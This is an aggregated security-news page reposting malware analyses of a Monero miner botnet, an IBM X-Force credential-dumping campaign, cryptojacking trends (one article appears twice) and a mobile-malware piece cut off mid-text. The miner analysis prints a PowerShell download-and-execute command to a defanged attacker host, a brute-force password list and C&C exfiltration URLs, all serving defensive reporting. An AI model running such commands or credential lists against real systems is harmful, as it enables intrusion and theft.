Browsing category

cryptocurrency

Computer Security, cryptocurrency, cryptocurrency mining, Cyber Security News, Malware, miner malware,

Miner Malware Uses Multiple Propagation Methods to Infect Windows Machines and to Drop Monero Miner

miner malware

A miner malware that uses a number of techniques that includes EternalBlue, Powershell abuse, pass-the-hash technique, Windows admin tools, and brute force to infect windows machine and to drop a Monero miner. According to Trend Micro telemetry, the threat actors behind the campaign expands botnet to other countries that include Australia, Taiwan, Vietnam, Hong Kong, […]

The post Miner Malware Uses Multiple Propagation Methods to Infect Windows Machines and to Drop Monero Miner appeared first on GBHackers On Security.

Botnets, cryptocurrency, EternalBlue, Malware, Monero, Open Source, PowerShell, Vulnerabilities,

Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse

By Augusto Remillano II and Arvin Macaraeg

We detected a malware that uses multiple propagation and infection methods to drop a Monero cryptocurrency miner onto as many systems and servers as possible. Initially observed in China in early 2019, the methods it previously used to infect networks involved accessing weak passwords and using pass-the-hash technique, Windows admin tools, and brute force attacks with publicly available codes. However, this new case we found in Japan involves the use of the EternalBlue exploit and the abuse of PowerShell to break into the system and evade detection.

It appears that the attackers are now expanding this botnet to other countries; our telemetry has since detected this threat in Australia, Taiwan, Vietnam, Hong Kong, and India.

Propagation and Behavior

The malware’s (detected by Trend Micro as Trojan.PS1.LUDICROUZ.A) primary propagation technique involves trying a list of weak credentials to log into other computers connected to the network. Instead of directly sending itself into all the systems connected, the remote command changes the firewall and port forwarding settings of the infected machines, setting up a scheduled task to download and execute an updated copy of the malware. The downloaded PowerShell script is executed with

IEX (New-Object Net.WebClient).downloadstring(‘hxxp://v.beahh[.]com/wm?hp’)

 

123456

password

PASSWORD

football

welcome

1

12

21

123

321

1234

12345

123123

123321

111111

654321

666666

121212

000000

222222

888888

1111

555555

1234567

12345678

123456789

987654321

admin

abc123

abcd1234

abcd@1234

abc@123

p@ssword

P@ssword

p@ssw0rd

P@ssw0rd

P@SSWORD

P@SSW0RD

P@$$w0rd

P@$$word

P@$$w0rd

iloveyou

monkey

login

passw0rd

master

hello

qazwsx

password1

qwerty

baseball

qwertyuiop

superman

1qaz2wsx

fuckyou

123qwe

zxcvbn

pass

aaaaaa

love

administrator

Table 1. List of weak passwords used for primary propagation.

It also uses this list with Invoke-WMIMethod (detected by Trend Micro as HackTool.Win32.Impacket.AI) to gain remote access to other machines:

Figure 1. Invoke-WMIMethod for remote access to machines with weak passwords.

The malware also uses the pass the hash method, wherein it authenticates itself to remote servers using the user’s hashed password. By using the Get-PassHashes command, the malware acquires the hashes stored in the machine, as well as the hashes of the weak passwords listed. After acquiring the hashes, the malware utilizes Invoke-SMBClient – another publicly available script – to perform file share operations using pass-the-hash.

Figure 2. Malware using pass-the-hash technique to get the hash of the user’s password and hashes of the weak passwords.

If successful, it deletes the file %Start Menu%ProgramsStartuprun.bat, likely a dropped file of an older version of the malware. It also drops the following:

  • %Application Data%flashplayer.tmp
  • %Application Data%sign.txt – used to indicate that the machine is already infected
  • %Start Menu%ProgramsStartupFlashPlayer.lnk – responsible for executing the script tmp at startup

If the user has a stronger password, the malware uses EternalBlue to propagate.

Figure 3. Exploit payload.

Once a machine is infected via one of the methods, the malware acquires the MAC address and collects information on the anti-virus products installed in the machine. It downloads another obfuscated PowerShell script (detected by Trend Micro as Trojan.PS1.PCASTLE.B) from the C&C server, and analysis revealed that the download URL sends back the information it acquired earlier to its handler. The downloaded PowerShell is a dropper, responsible for downloading and executing the malware’s components, most of which are copies of itself.

Figure 4. Routine for acquiring the MAC address and AV products installed by the malware.

To check whether the malware already installed its components it looks for the following files:

  • %Temp%kkk1.log
  • %Temp%pp2.log
  • %Temp%333.log
  • %Temp%kk4.log
  • %Temp%kk5.log

Figure 5. Checking for installed malware components.

With each $flagX representing a component, the malware downloads a newer version of the PowerShell dropper script ($flag) and installs a scheduled task to run it regularly if it is still unset. The behavior of the malware depends on the privilege it was run. $flag2 also downloads a copy of the malware from a different URL and creates a differently named scheduled task.

Figure 6. $flag and $flag2 for scheduled tasks.

The third component (detected by Trend Micro as TrojanSpy.Win32.BEAHNY.THCACAI) is a dropped Trojan — a copy of itself in a larger file size, likely to evade sandboxes — that collects system information from the host:

  • Computer Name
  • Machine’s GUID
  • MAC Address
  • OS Version
  • Graphics Memory Information
  • System Time

The fourth component is a Python-compiled binary executable that further propagates the malware, also capable of pass the hash attacks by dropping and executing a PowerShell implementation of Mimikatz (detected by Trend Micro as Trojan.PS1.MIMIKATZ.ADW).

Figure 7. Dropping the fourth executable component.

Figure 8. Checking if the Mimikatz component is already installed, and executing Mimikatz.

The malware also attempts to use weak SQL passwords to access vulnerable database servers, executing shell commands using xp_cmdshell upon access. Like the main file, the component scans IP blocks for vulnerable devices that can be exploited using EternalBlue by reusing publicly available codes related to previous exploits.

Figure 9. Scanning for vulnerable database servers.

The fifth component is an executable that is downloaded and executed. However, the download URL was offline at the time of writing.

The malware’s payload — a Monero coinminer — is also deployed by PowerShell, but is not stored in a file. Instead, it is injected into its own PowerShell process with another publicly available code, Invoke-ReflectivePEInjection. After installation, the malware reports its status to the C&C server.

Figure 10. PowerShell script that downloads and executes the miner payload.

Figure 11. Executing the miner payload.

Conclusion

We found the malware sample to be sophisticated, designed specifically to infect as many machines as possible and to operate without immediate detection. It leverages weak passwords in computer systems and databases, targets legacy software that companies may still be using, uses PowerShell-based scripts with components downloaded and executed in memory, exploits unpatched vulnerabilities, and installs using the Windows startup folder and the task scheduler. Considering the increasing popularity of PowerShell and more publicly available open-source codes, we can expect to see more complicated malware like these. And while system information being collected and sent back to the C&C may appear insignificant compared to directly stealing personally identifiable information, system information is unique to machines and may be used to trace, identify, and track users and activities.

Figure 12. Malware’s new URL.

We recommend updating systems with available patches from legitimate vendors as soon as possible. Users of legacy software should also update with virtual patches from credible sources. As of this writing, the malware is still active and was updated, connecting to a new URL. Use complicated passwords, and authorize layered authentication whenever possible. Enterprises are also advised to enable a multi-layered protection system that can actively block these threats and malicious URLs from the gateway to the endpoint.

 

Indicators of Compromise

SHA256 Detection
3f28cace99d826b3fa6ed3030ff14ba77295d47a4b6785a190b7d8bc0f337e41 Trojan.PS1.MIMIKATZ.ADW
7c402add8feffadc6f07881d201cb21bc4b39df98709917949533f6febd53b6e Trojan.PS1.LUDICROUZ.A
aaef385a090d83639fb924c679b2ff22e90ae9377774674d537670a975513397 TrojanSpy.Win32.BEAHNY.THCACAI
e28b7c8b4fc37b0ef91f32bd856dd71599acd2f2071fcba4984cc331827c0e13 Trojan.PS1.PCASTLE.B
fa0978b3d14458524bb235d6095358a27af9f2e9281be7cd0eb1a4d2123a8330 HackTool.Win32.Impacket.AI

 

URLs

hxxp://down[.]beahh[.]com/c32.dat

hxxp://down[.]beahh[.]com/new.dat?allv5

hxxp://ii[.]ackng[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}

hxxp://log[.]beahh[.]com/logging.php?ver=5p?src=wm&target

hxxp://oo[.]beahh[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}

hxxp://p[.]beahh[.]com/upgrade.php

hxxp://pp[.]abbny[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}

hxxp://v[.]beahh[.]com/wm?hp

hxxp://v[.]y6h[.]net/g?h

hxxp://v[.]y6h[.]net/g?l

lplp1[.]abbny[.]com:443

lplp1[.]ackng[.]com:443

lplp1[.]beahh[.]com:443

 

Additional insights and analysis by Carl Maverick Pascual and Patrick Angelo Roderno.

The post Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse appeared first on .

This post appeared first on Trend Macro Blog
Author: Trend Micro

Credentials, cryptocurrency, cryptocurrency miner, Cyberattack, Cybercrime, Cybercriminals, IBM X-Force Exchange, IBM X-Force Research, Incident Response, passwords, Threat Intelligence, X-Force,

Credential Dumping Campaign Hits Multinational Corporations

Server Misconfigurations Result in Ongoing Theft of Corporate Credentials, Cryptojacking Infections on User and Enterprise Assets

IBM X-Force Incident Response and Intelligence Services (IRIS), our team of veteran incident response and intelligence professionals, responds to cyberattacks taking place in different parts of the globe.

In a recent investigation, our team discovered that multinational corporations in various sectors are being targeted by attackers using malicious scripts to automate attacks on misconfigured servers. The attacks resulted in a continuous credential dumping campaign that exfiltrated the corporate credentials of infected network users. On the other side of the compromised servers, attackers continue to operate a public File Transfer Protocol (FTP) server that collects credentials from additional compromised networks and then sends them to a third host, presumably into the attackers’ hands for later use.

On top of the credential theft, the attackers behind this campaign infect devices with cryptocurrency miners.

Let’s examine the technical details of this live campaign to shed more light on attacker tactics, techniques and procedures (TTPs) and outline some tips to help defenders prevent this sort of active leak.

IBM X-Force duly reported this ongoing operation to law enforcement in the corresponding jurisdictions.

Automation and Windows OS Tools Make for a Stealthy Operation

In a malicious campaign X-Force IRIS discovered in February 2019, the team found that some of the top adversarial tactics reported by IBM to target organizations in the wild are being actively used against unsuspecting organizations:

  • Exploiting misconfigured servers and Windows-based client-side operating systems;
  • Living off the land by using embedded operating system tools; and
  • Automating attacks using malicious PowerShell scripts.

The attack campaign harvests corporate credentials from a number of compromised networks, most likely due to the same reason across the board: server misconfiguration leaving various ports open and unprotected and weak administrator passwords without second-factor authentication enforced.

The attackers in this ongoing campaign are using PowerShell scripts and automation to exploit the servers with the DoublePulsar kernel exploit. They also take advantage of Transmission Control Protocol (TCP) port 445 for communicating with the network — a Server Message Block (SMB) ports that has been exploited in previous attacks, including WannaCry and NotPetya, for lateral movement.

A look at the distribution of victimized devices reveals that while most of them could be user devices (Win7), the second-most targeted asset type is Windows Server 2008.

IBM X-Force

Figure 1: Distribution of affected devices per OS version

Multistage Malicious Script Fetches and Runs Malware Files

To get to network users and harvest their credentials, the attackers in this campaign begin with a malicious script. The script fetches and runs additional files via PowerShell, enabling it to use Mimikatz and PowerSploit on the targeted devices to dump the user’s credentials.

An excerpt of the script appears below (please note that this article does not provide a comprehensive analysis of the malicious service’s installation script).

IBM X-Force

Figure 2: Malicious script installs attacker’s Windows service

The overall goal of the script is to fetch additional malcode from various rogue hosts maintained by the attackers. Below are two of the main components of the attacks:

  1. s.txt
  2. up.txt

We can see those being pulled from a remote server hosted on hxxp://74.222.1.38. With WhoIs data being protected, we could only note that the host is a dedicated server infrastructure likely rented out by the attackers or exploited for their attacks.

IBM X-Force

Figure 3: Malicious script installs attacker’s Windows service

A Closer Look at Malicious File ‘Up.txt’

Looking into the activity launched by the extra files fetched into the compromised devices, we could see that the code is executed and performs the following actions:

  • Collects the private and public IP address of the infected device and identifies the public IP address via hxxp://2019.ip138.com/ic.asp.
  • Enumerates the device’s OS version and live processes from the system using WMI queries.
  • Downloads and executes Mimikatz from GitHub.
  • Creates an output file with process information and dumped credentials. File names attributed to each file are structured as follows: PublicIP_PrivateIP_OSVersion_CPUload.txt. For example: 79.XXX.XX.12_192.168.37.147_Microsoft Windows 7 Ultimate [6.1.7601]_5%.txt.
  • Uploads output file to a public FTP server using the attacker’s hardcoded credentials.

While the attacker placed their hardcoded credentials to the malicious FTP in plain view, they ensured that unwelcome access would receive read-only rights. That means outsiders cannot grab existing content on the FTP server.

Output files containing stolen system information and network credentials arrive at the FTP server but only remain there for a few seconds before being exfiltrated onward to another server and deleted from the FTP server.

How Much Is Too Much? Campaign Statistics

Statistics of uploaded data to the malicious FTP server show that the activity is generating a large number of uploads from compromised devices. While the number of uploads is large, file sizes are very small, likely because they only contain a few strings of textual information. The following image shows the accumulation of data on the public FTP server within 60 seconds:

Data theft rate in 60 seconds

Figure 4: Rapid accumulation of victims’ stolen data on public FTP server

Judging by the number of unique IP addresses from which the data is being streamed into the attackers’ FTP — close to 85,000 IPs — we are seeing that the scope of the campaign is meaningful.

The following numbers accumulated over the period of 11 days provide further context about the size of this malicious operation:

Description

Number

Affected countries per IP geo-location analysis.

180 – ongoing

Files uploaded from infected devices.

1,663,156 – ongoing

Unique IP addresses uploading stolen data.

84,683 – ongoing

Files exfiltrating large amounts of data.

59,688 – ongoing

Files exfiltrating small amounts of data.

933,994 – ongoing

The campaign’s scope can be estimated through the number of uploads per day, showing many devices are likely compromised in each organization.

Data drops per dayFigure 5: A sample of campaign dates showing the scope of stolen data dropped daily

A view of the location of infected devices affected by this campaign reveals that the largest number is located in China, Taiwan and Russia. This may be part of a nation-sponsored campaign by regional threat actors targeting organizations and government entities in Asia.

Country distirbution of campaign

Figure 6: Campaign’s country distribution per geo-IP location

All in an Attacker’s Workday

The TTPs used in this malicious campaign by unknown attackers are almost taken from an attacker’s playbook. Using automated tools, living off the land, using PowerShell and infecting devices with cryptominers are the top tactics highlighted by IBM X-Force’s “Threat Intelligence Index.”

Below are some tips to protect assets against this sort of attack and help prevent initial access to externally facing servers and user devices:

  • Ensure systems are fully patched.
  • Perform regular vulnerability scans to identify missing security updates.
  • Keep antivirus and anti-malware solutions up to date and configure them to automatically conduct regular scans.
  • Manage usage of privileged accounts. Implement the principle of least privilege. Do not assign administrative access to users unless absolutely needed.
  • Enhance security of WMI by authorizing WMI users and restricting permissions.
  • Enable host-based firewalls and restrict internal communications to limit unnecessary lateral movement.
  • Close ports on externally facing servers.
  • If ports remain open, secure them with the necessary controls or place compensating controls as needed.
  • Monitor communication via SMB ports to external servers and investigate suspicious cases of data regularly leaving the organization.
  • Disable SMB v1 and similar legacy protocols completely.

Campaign IoCs

This malicious activity is still ongoing at the time of this writing. Security professionals who wish to use indicators of compromise (IoCs) from the campaign to defend their networks can receive additional data via X-Force Exchange.

The post Credential Dumping Campaign Hits Multinational Corporations appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Thanassis Diogos

cryptocurrency, cryptocurrency miner, IBM X-Force Incident Response and Intelligence Services (IRIS), IBM X-Force Research, Injection Attacks, Malware, Risk Management, Threat Intelligence,

Cryptojacking Attacks: Who’s Mining on Your Coin?

Data from the “IBM X-Force Threat Intelligence Index” for 2018 illustrated that threat actors have been increasingly using malicious cryptomining, aka cryptojacking attacks, to easily monetize their access to systems with minimal risk. The 2019 report showed that threat actors continue to use these attacks to compromise systems and generate a revenue stream.

There are two types of cryptomining attacks that have been making the rounds since 2018:

  1. Malicious mining via compromised websites, also known as cryptojacking. This activity takes place in-browser.
  2. Malware-based cryptomining attacks on a user’s device. This activity relies on the device’s central processing unit (CPU) power.

In 2018, X-Force saw a majority of browser-based mining versus the malware-based variety. In fact, our data shows a nearly 2-1 ratio, respectively. This attack tactic is becoming a rising issue; cryptojacking presents a unique challenge for organizations to detect and mitigate because malicious scripts are almost always hosted outside the organization’s zone of control.

Cryptojacking definitely trended in 2018, but are tides about to turn? X-Force data from late 2018 and early 2019 showed that browser-based cryptojacking attacks are on the decline while also revealing a notable increase in malware-based attacks.

Cryptomining Malware: A Primer

The value and popularity of cryptocurrency have been growing across the globe, and criminals are always looking for ways to generate passive income. One of the ways they tie the two together is by using coin-mining malware. Research from X-Force has addressed cryptocurrency miners before. To review, cryptominers are placed on an infected machine or device and use its native processing power to mine for cryptocurrency.

Historically, threat actors have targeted individual user boxes to drop cryptocurrency miners on, but recent research from X-Force Incident Response and Intelligence Services (IRIS) suggested that since at least 2017, threat actors have also tried to infect targeted internet of things (IoT) devices despite their low processing power.

What Could Be Driving a Shift to Cryptojacking?

Why would threat actors use malicious cryptomining instead of focusing on other attacks such as ransomware, for example? Threat actors can see some success in getting their malware on user devices, but for those motivated by monetary gain, converting that access into spendable currency has always been a challenge.

Over time, cybercriminals have tried different methods, such as selling stolen data, locking a device and demanding ransom payment from its owner, and selling a remote shell to the compromised device to other threat actors who can then deploy their own attack tactics on that device.

All of these tactics primarily require other people to become involved in their success — an option most criminals prefer to forego if only to avoid sharing the spoils. But they can’t sell access or data without a buyer, nor can they profit from ransomware without someone on the other end willing to pay. To minimize interaction with other parties, including victims who may or may not pay, many criminals evidently prefer cryptojacking. These attacks are suited for cybercriminals at any skill level, do not require much in terms of interaction with third parties and can be monetized relatively easily when compared with malware operations such as ransomware and banking Trojans.

To get into user devices, threat actors often deploy cryptomining malware via command injection attacks against enterprise-level assets, such as vulnerable applications in content management systems (CMSs). In instances observed by X-Force IRIS, attackers have attempted to plant malicious images on victims’ machines using wget and curl shell commands when victims simply visit a malicious page via a link in an email or through a compromised site.

2018: The Rise of Cryptomining in the Browser

Browser-based cryptojacking involves a threat actor infecting a web server or website and then injecting a cryptomining script into an otherwise legitimate website. Alternatively, the script can be inserted into an online advertisement, whether malicious or wholly illegitimate, and used with a legitimate ad service so that the script runs every time the browser is open.

X-Force research saw an explosion of cryptojacking activity in 2018, with cryptojacking attacks far exceeding all other forms of coin theft attacks.

Some of this rise in browser-based cryptojacking comes from unintended sources, such as vendors who sell cryptojacking scripts as an alternative to running advertisements on websites. The initial purpose is legitimate, but they can also be used by attackers who run them on compromised websites. One of the largest providers of mining scripts of that type was Coinhive, an organization that pioneered the sale of these scripts. As a result of frequent use of Coinhive scripts in cryptojacking attacks, users and security professionals would often see the name “Coinhive” or “Coinhive.Miner” appear as a malicious issue. In March 2019, Coinhive voluntarily ceased operations.

2018 Cryptojacking attacks by type

Figure 1: Cryptojacking attacks exceeded malware cryptomining attacks by a nearly 2-1 ratio in 2018 (source: IBM X-Force)

Cryptojacking Was Big in 2018, So Why Shift to Cryptomining Malware in 2019?

As our data shows, browser-based cryptojacking was big in 2018. But as we moved into 2019, our data started showing a decline in that type of attack and a return to malware-based cryptojacking. A number of factors could be contributing to this shift.

One possibility is that the recent drop in cryptocurrency prices has made mining in the browser less profitable. Since the browser is merely an application on a device, it cannot generate the same computing power as infecting the actual device. As a result, this type of cryptojacking takes much longer to generate each coin, which may be incentivizing threat actors to refocus on malware infections to speed things up.

Additionally, sharply reduced cryptocurrency value could encourage actors to move to an entirely different revenue stream, causing cryptomining malware to have a higher proportion of activity even though nominal levels may have dropped.

Threat actors could also be temporarily shifting away from browser-based cryptojacking if they relied on Coinhive to provide them with scripts. With Coinhive gone, threat actors would have to go to other script providers. While there are many other providers of the same sort of scripts, the removal of Coinhive could affect the overall ability of the technically unskilled to create web-based cryptojacking attacks.

Don’t rejoice just yet — browser-based cryptojacking may see a resurgence in the near future due to the recent and sharp drop in the Monero hash rate. A reduced hash rate makes mining each coin less computationally intensive, making cryptojacking a more profitable option despite its lower harvesting power.

Which Should I Worry About More: Browser-Based Cryptojacking or Cryptomining Malware?

The short answer is both. X-Force data indicates that while browser-based cryptojacking was increasingly popular through most of 2018, cryptomining malware made a resurgence at the end of 2018 and into the first quarter of 2019.

The rise and fall of cryptojacking popularity

Figure 2: IBM X-Force data showing the rise and fall of cryptojacking popularity (source: IBM X-Force)

Browser-based cryptojacking was very popular with threat actors earlier in 2018, likely due to the following factors:

  • Without having to use malware and maintain a botnet, browser-based attacks can be easier for cybercriminals to set up compared to other forms of cryptomining attacks.
  • Threat actors needed only to infect a single web server to deploy a cryptojacking script to all visitors of that site and any other sites hosted thereon.
  • Cryptojacking is tougher for organizations to mitigate than cryptomining malware, since the infection occurs outside the organization on an unaffiliated server and takes advantage of users browsing to a compromised resource. In most cases, when the company’s security team sees alerts for mining activity, there isn’t much it can do to clean up within the company’s own devices. While one could notify the web server’s owner of the compromise, they may not know what to do about it or fail to address the issue.
  • With browser-based cryptojacking, a threat actor can forego wide-cast infection campaigns and the need to infect myriad devices. Instead, they aim to compromise a few web servers and expect to reach untold numbers of site visitors.

Cryptojacking attacks by type

Figure 3: Browser-based cryptojacking resides outside an organization’s zone of control (source: IBM X-Force)

Some Tips for Defenders

Malicious cryptomining and browser-based cryptojacking attacks are plentiful, but they are not impossible to defend against. Here are some tips for defenders from our X-Force IRIS threat intelligence specialists:

  • Engage in a thorough risk assessment to determine the acceptable risk appetite for malicious cryptomining activity for the organization.
  • Restrict outbound calls to cryptomining pools to help detect and prevent cryptomining within the organization’s environments.
  • Where feasible, disable JavaScript in browsers to directly prevent cryptojacking scripts from executing.
  • Update host-based detection signatures to include the latest cryptomining malware and, if possible, alert on significantly anomalous processor activity that may be indicative of ongoing cryptomining malware infections.
  • Continue updating intrusion detection and prevention system (IDS/IPS) signatures to help block the latest cryptojacking scripts.
  • Work closely with network security operations to block traffic to and from known cryptojacking addresses that can be obtained from a threat intelligence provider or maintained internally.
  • Educate stakeholders on the difference between browser- and device-based cryptojacking to facilitate better informed conversations on the organization’s cybersecurity posture.

Join X-Force Exchange to stay up to date on cryptojacking campaigns


The post Cryptojacking Attacks: Who’s Mining on Your Coin? appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Charles DeBeck

cryptocurrency, cryptocurrency miner, IBM X-Force Incident Response and Intelligence Services (IRIS), IBM X-Force Research, Injection Attacks, Malware, Risk Management, Threat Intelligence,

Cryptojacking Attacks: Who’s Mining on Your Coin?

Data from the “IBM X-Force Threat Intelligence Index” for 2018 illustrated that threat actors have been increasingly using malicious cryptomining, aka cryptojacking attacks, to easily monetize their access to systems with minimal risk. The 2019 report showed that threat actors continue to use these attacks to compromise systems and generate a revenue stream.

There are two types of cryptomining attacks that have been making the rounds since 2018:

  1. Malicious mining via compromised websites, also known as cryptojacking. This activity takes place in-browser.
  2. Malware-based cryptomining attacks on a user’s device. This activity relies on the device’s central processing unit (CPU) power.

In 2018, X-Force saw a majority of browser-based mining versus the malware-based variety. In fact, our data shows a nearly 2-1 ratio, respectively. This attack tactic is becoming a rising issue; cryptojacking presents a unique challenge for organizations to detect and mitigate because malicious scripts are almost always hosted outside the organization’s zone of control.

Cryptojacking definitely trended in 2018, but are tides about to turn? X-Force data from late 2018 and early 2019 showed that browser-based cryptojacking attacks are on the decline while also revealing a notable increase in malware-based attacks.

Cryptomining Malware: A Primer

The value and popularity of cryptocurrency have been growing across the globe, and criminals are always looking for ways to generate passive income. One of the ways they tie the two together is by using coin-mining malware. Research from X-Force has addressed cryptocurrency miners before. To review, cryptominers are placed on an infected machine or device and use its native processing power to mine for cryptocurrency.

Historically, threat actors have targeted individual user boxes to drop cryptocurrency miners on, but recent research from X-Force Incident Response and Intelligence Services (IRIS) suggested that since at least 2017, threat actors have also tried to infect targeted internet of things (IoT) devices despite their low processing power.

What Could Be Driving a Shift to Cryptojacking?

Why would threat actors use malicious cryptomining instead of focusing on other attacks such as ransomware, for example? Threat actors can see some success in getting their malware on user devices, but for those motivated by monetary gain, converting that access into spendable currency has always been a challenge.

Over time, cybercriminals have tried different methods, such as selling stolen data, locking a device and demanding ransom payment from its owner, and selling a remote shell to the compromised device to other threat actors who can then deploy their own attack tactics on that device.

All of these tactics primarily require other people to become involved in their success — an option most criminals prefer to forego if only to avoid sharing the spoils. But they can’t sell access or data without a buyer, nor can they profit from ransomware without someone on the other end willing to pay. To minimize interaction with other parties, including victims who may or may not pay, many criminals evidently prefer cryptojacking. These attacks are suited for cybercriminals at any skill level, do not require much in terms of interaction with third parties and can be monetized relatively easily when compared with malware operations such as ransomware and banking Trojans.

To get into user devices, threat actors often deploy cryptomining malware via command injection attacks against enterprise-level assets, such as vulnerable applications in content management systems (CMSs). In instances observed by X-Force IRIS, attackers have attempted to plant malicious images on victims’ machines using wget and curl shell commands when victims simply visit a malicious page via a link in an email or through a compromised site.

2018: The Rise of Cryptomining in the Browser

Browser-based cryptojacking involves a threat actor infecting a web server or website and then injecting a cryptomining script into an otherwise legitimate website. Alternatively, the script can be inserted into an online advertisement, whether malicious or wholly illegitimate, and used with a legitimate ad service so that the script runs every time the browser is open.

X-Force research saw an explosion of cryptojacking activity in 2018, with cryptojacking attacks far exceeding all other forms of coin theft attacks.

Some of this rise in browser-based cryptojacking comes from unintended sources, such as vendors who sell cryptojacking scripts as an alternative to running advertisements on websites. The initial purpose is legitimate, but they can also be used by attackers who run them on compromised websites. One of the largest providers of mining scripts of that type was Coinhive, an organization that pioneered the sale of these scripts. As a result of frequent use of Coinhive scripts in cryptojacking attacks, users and security professionals would often see the name “Coinhive” or “Coinhive.Miner” appear as a malicious issue. In March 2019, Coinhive voluntarily ceased operations.

2018 Cryptojacking attacks by type

Figure 1: Cryptojacking attacks exceeded malware cryptomining attacks by a nearly 2-1 ratio in 2018 (source: IBM X-Force)

Cryptojacking Was Big in 2018, So Why Shift to Cryptomining Malware in 2019?

As our data shows, browser-based cryptojacking was big in 2018. But as we moved into 2019, our data started showing a decline in that type of attack and a return to malware-based cryptojacking. A number of factors could be contributing to this shift.

One possibility is that the recent drop in cryptocurrency prices has made mining in the browser less profitable. Since the browser is merely an application on a device, it cannot generate the same computing power as infecting the actual device. As a result, this type of cryptojacking takes much longer to generate each coin, which may be incentivizing threat actors to refocus on malware infections to speed things up.

Additionally, sharply reduced cryptocurrency value could encourage actors to move to an entirely different revenue stream, causing cryptomining malware to have a higher proportion of activity even though nominal levels may have dropped.

Threat actors could also be temporarily shifting away from browser-based cryptojacking if they relied on Coinhive to provide them with scripts. With Coinhive gone, threat actors would have to go to other script providers. While there are many other providers of the same sort of scripts, the removal of Coinhive could affect the overall ability of the technically unskilled to create web-based cryptojacking attacks.

Don’t rejoice just yet — browser-based cryptojacking may see a resurgence in the near future due to the recent and sharp drop in the Monero hash rate. A reduced hash rate makes mining each coin less computationally intensive, making cryptojacking a more profitable option despite its lower harvesting power.

Which Should I Worry About More: Browser-Based Cryptojacking or Cryptomining Malware?

The short answer is both. X-Force data indicates that while browser-based cryptojacking was increasingly popular through most of 2018, cryptomining malware made a resurgence at the end of 2018 and into the first quarter of 2019.

The rise and fall of cryptojacking popularity

Figure 2: IBM X-Force data showing the rise and fall of cryptojacking popularity (source: IBM X-Force)

Browser-based cryptojacking was very popular with threat actors earlier in 2018, likely due to the following factors:

  • Without having to use malware and maintain a botnet, browser-based attacks can be easier for cybercriminals to set up compared to other forms of cryptomining attacks.
  • Threat actors needed only to infect a single web server to deploy a cryptojacking script to all visitors of that site and any other sites hosted thereon.
  • Cryptojacking is tougher for organizations to mitigate than cryptomining malware, since the infection occurs outside the organization on an unaffiliated server and takes advantage of users browsing to a compromised resource. In most cases, when the company’s security team sees alerts for mining activity, there isn’t much it can do to clean up within the company’s own devices. While one could notify the web server’s owner of the compromise, they may not know what to do about it or fail to address the issue.
  • With browser-based cryptojacking, a threat actor can forego wide-cast infection campaigns and the need to infect myriad devices. Instead, they aim to compromise a few web servers and expect to reach untold numbers of site visitors.

Cryptojacking attacks by type

Figure 3: Browser-based cryptojacking resides outside an organization’s zone of control (source: IBM X-Force)

Some Tips for Defenders

Malicious cryptomining and browser-based cryptojacking attacks are plentiful, but they are not impossible to defend against. Here are some tips for defenders from our X-Force IRIS threat intelligence specialists:

  • Engage in a thorough risk assessment to determine the acceptable risk appetite for malicious cryptomining activity for the organization.
  • Restrict outbound calls to cryptomining pools to help detect and prevent cryptomining within the organization’s environments.
  • Where feasible, disable JavaScript in browsers to directly prevent cryptojacking scripts from executing.
  • Update host-based detection signatures to include the latest cryptomining malware and, if possible, alert on significantly anomalous processor activity that may be indicative of ongoing cryptomining malware infections.
  • Continue updating intrusion detection and prevention system (IDS/IPS) signatures to help block the latest cryptojacking scripts.
  • Work closely with network security operations to block traffic to and from known cryptojacking addresses that can be obtained from a threat intelligence provider or maintained internally.
  • Educate stakeholders on the difference between browser- and device-based cryptojacking to facilitate better informed conversations on the organization’s cybersecurity posture.

Join X-Force Exchange to stay up to date on cryptojacking campaigns


The post Cryptojacking Attacks: Who’s Mining on Your Coin? appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Charles DeBeck

app security, Artificial Intelligence (AI), banking malware, Connected Devices, cryptocurrency, Data Protection, Google Play, Malware, Mobile Applications, Mobile Devices, Mobile Malware, Mobile Security, Mobile Threats, Password Management, Patch Management, Public Wi-Fi, Threat Detection, trojan,

Preparing for the Unpredictable: Security in a New World of Mobile Malware

Mobile malware is nothing new. But in recent months, attackers have been getting more creative and resourceful with how they conceal, distribute and deploy these threats.

This newfound creativity is part of a mobile threat trend that can be summarized as follows: Attacks are on the rise, they’re focusing on mobile devices and they’re getting far more aggressive with their methods.

Mobile Threats by the Numbers

The numbers are staggering. Kaspersky Lab’s “Mobile Malware Evolution 2018” report found that the number of devices attacked by malware increased from 66.4 million in 2017 to 116.5 million in 2018 — and we should assume another big rise for 2019. The researchers also found that the “quality” of malware — its precision and impactfulness — is on the rise. The number of so-called “Trojan-droppers” — malware that gets past security to deliver its payload — doubled from 2017 to 2018, according to the report.

In its most recent “Mobile Threat Report,” McAfee detailed how mobile phones are being increasingly targeted with mobile app backdoors, banking Trojans and cryptomining malware. One alarming trend is the number of fake apps appearing in dozens of app stores, raising from around 10,000 fake apps in the middle of 2018 to approximately 65,000 by the end of the year.

In addition, Verizon’s most recent “Mobile Security Index 2019” found that a majority of those surveyed believed their organization is at risk of mobile threats. One-third of companies reported suffering a compromise that involved mobile devices. Despite this, more than half said they had sacrificed security to “get the job done.” An incredible 81 percent of respondents said they had personally used insecure public WiFi for work, despite knowing that the practice is both unsafe and prohibited by company policy.

All this is to say that the threat from mobile devices is increasing at an extremely high rate, yet most organizations are woefully unready.

A New World of Mobile Malware

All that data around the rising threat of mobile-based attacks doesn’t fully address the quality of the latest malware. Just look at the creative thinking behind a recent incarnation of malware called Anubis.

Anubis’ Motion-Based Evasion Tactics

Distributed inside at least two apps available on the Google Play store, Anubis banking malware concealed itself using the target phones’ motion sensors. Researchers often use emulators to hunt for Trojans in apps — or they search on real phones, which are often mounted and motionless. The Anubis creators figured out that one difference between security researchers and real-life users is motion. By activating only after motion was detected, the malware could remain invisible to many researchers but still activate on phones in the wild.

